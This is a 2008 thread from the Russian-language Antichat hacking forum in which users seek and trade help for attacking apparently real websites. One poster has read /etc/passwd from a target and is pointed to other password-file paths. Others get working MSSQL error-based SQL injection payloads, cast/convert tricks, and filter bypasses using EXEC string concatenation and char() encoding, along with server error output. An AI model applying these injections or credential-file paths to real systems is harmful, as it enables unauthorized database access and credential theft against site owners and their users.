ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.11.2008, 19:26
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
Сообщение от Octave_Parango
Приветствую Всех.
Вытащил все из /etc/passwd/ вот такого вида:
Как я понимаю, тут одни логины, пассы должны лежать в etc/shadow, там пусто, так как доступно только для пользователя с рутовами правами...
Подскажите, как дальше действовать?
хэши паролей заменены на 'x', так что содержание файла бесполезное.
посмотри так же:
Код:
/etc/shadow.old
/etc/passwd.tmp
/etc/master.passwd
но сомневаюсь, что ситуация изменится (-
Последний раз редактировалось Calcutta; 25.11.2008 в 19:31..
|
|
|
25.11.2008, 19:49
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Сообщение от Calcutta
хэши паролей заменены на 'x', так что содержание файла бесполезное.
посмотри так же:
Код:
/etc/shadow.old
/etc/passwd.tmp
/etc/master.passwd
но сомневаюсь, что ситуация изменится (-
Да, везде пусто. Обидно.
Еще как-нибудь можно подлезь? Есть варианты?
|
|
|
|
25.11.2008, 19:56
|
|
Новичок
Регистрация: 07.10.2007
Сообщений: 4
Провел на форуме:
32389
Репутация:
1
|
|
Добрый день
Подскажите пожалуйста как вывести в ошибке MSSQL данные типа "int"
1+or+1=(SELECT intColumn ...) не вызывает ошибки в случае если column имеет тип int, только при varchar.
Спасибо.
Последний раз редактировалось Parti; 25.11.2008 в 20:07..
|
|
|
|
25.11.2008, 22:42
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от Parti
Добрый день
Подскажите пожалуйста как вывести в ошибке MSSQL данные типа "int"
1+or+1=(SELECT intColumn ...) не вызывает ошибки в случае если column имеет тип int, только при varchar.
Спасибо.
1 or 1=(SELECT cast(name as nvarchar(4000)) FROM table)--
1 or 1=(SELECT convert(nvarchar,name) FROM table)--
|
|
|
|
25.11.2008, 23:40
|
|
Новичок
Регистрация: 07.10.2007
Сообщений: 4
Провел на форуме:
32389
Репутация:
1
|
|
Сообщение от [Raz0r]
1 or 1=(SELECT cast(name as nvarchar(4000)) FROM table)--
1 or 1=(SELECT convert(nvarchar,name) FROM table)--
Оба эти запроса не выдали ошибку :S.
Используется mssql в связке с ASP.Net.
Microsoft SQL Server 2000 - 8.00.2187 (Intel X86) Mar 9 2006 11:38:51 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
|
|
|
|
25.11.2008, 21:39
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Вопрос:
Короче есть бажный параметр mssql-inj.
.asp?id=.....
Запросы типа -1+or+1=(@@version), db_name() и тд проходят на ура.
Скрипт фильтрует операторы (select, update, и тд..).
Какие методы обхода фильтраций существуют? В mysql много знаю, а вот s mssql впервые столкнулся.
|
|
|
|
25.11.2008, 22:32
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
ссылку в пм или сюда
|
|
|
|
25.11.2008, 22:45
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Какие методы обхода фильтраций существуют? В mysql много знаю, а вот s mssql впервые столкнулся.
';EXEC('SEL'+'ECT US'+'ER')--
|
|
|
|
26.11.2008, 10:51
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Сообщение от [Raz0r]
';EXEC('SEL'+'ECT US'+'ER')--
Exec тоже под фильтром.
Я попробовал сделать так :
page.asp?id=-1+or+1=(char(0x73)%2bchar(0x65)%2bchar(0x6c)%2bcha r(0x65)%2bchar(0x63)%2bchar(0x74)%2bchar(0x7e)%2b+ user)--sp_password
Получил:
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'select~dbo' to data type int.
Если же попробовать к примеру top 1 table_name from .... , то тут уже нестыковка синтаксиса.
|
|
|
|
25.11.2008, 23:52
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
попробуй так
1 or 1=(select convert(int,substring(convert(varchar,name)+char(5 8),1,999)) from table)--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?961664){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?961671){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?961819){kind=avatar}
Похожие темы
Комбинированный вид